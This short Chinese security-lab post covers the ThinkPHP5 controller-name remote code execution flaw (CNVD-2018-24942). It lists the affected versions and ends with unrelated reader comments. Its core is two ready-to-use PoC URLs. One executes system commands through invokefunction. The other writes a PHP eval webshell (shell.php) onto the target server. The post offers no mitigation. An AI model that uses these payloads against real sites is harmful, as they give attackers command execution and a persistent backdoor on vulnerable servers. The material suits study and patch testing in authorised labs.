CNVD-2018-24942
漏洞描述:ThinkPHP5存在远程代码执行漏洞。由于框架对控制器名称未能进行充分检测,攻击者可以利用该漏洞对网站进行远程命令执行(RCE)。
影响版本:
- 上海顶想信息科技有限公司 ThinkPHP 5.*,<5.1.31
- 上海顶想信息科技有限公司 ThinkPHP <=5.0.23
参考资料:
POC:
//远程代码执行
http://ip/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
//上传一句话
http://ip/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[pass])?%3E漏洞复现
![图片[1]-【初级】ThinkPHP5远程代码执行漏洞-NGC660 安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd234436-1024x660.png)
![图片[2]-【初级】ThinkPHP5远程代码执行漏洞-NGC660 安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd234443-1024x660.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 1个月前0
好的,谢谢昶之琴
1个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 1个月前0
帆软部署 ,访问的地址访问不到昶之琴
2年前0
我以为只要提交就行了好想告诉你
2年前0
花巨资看一下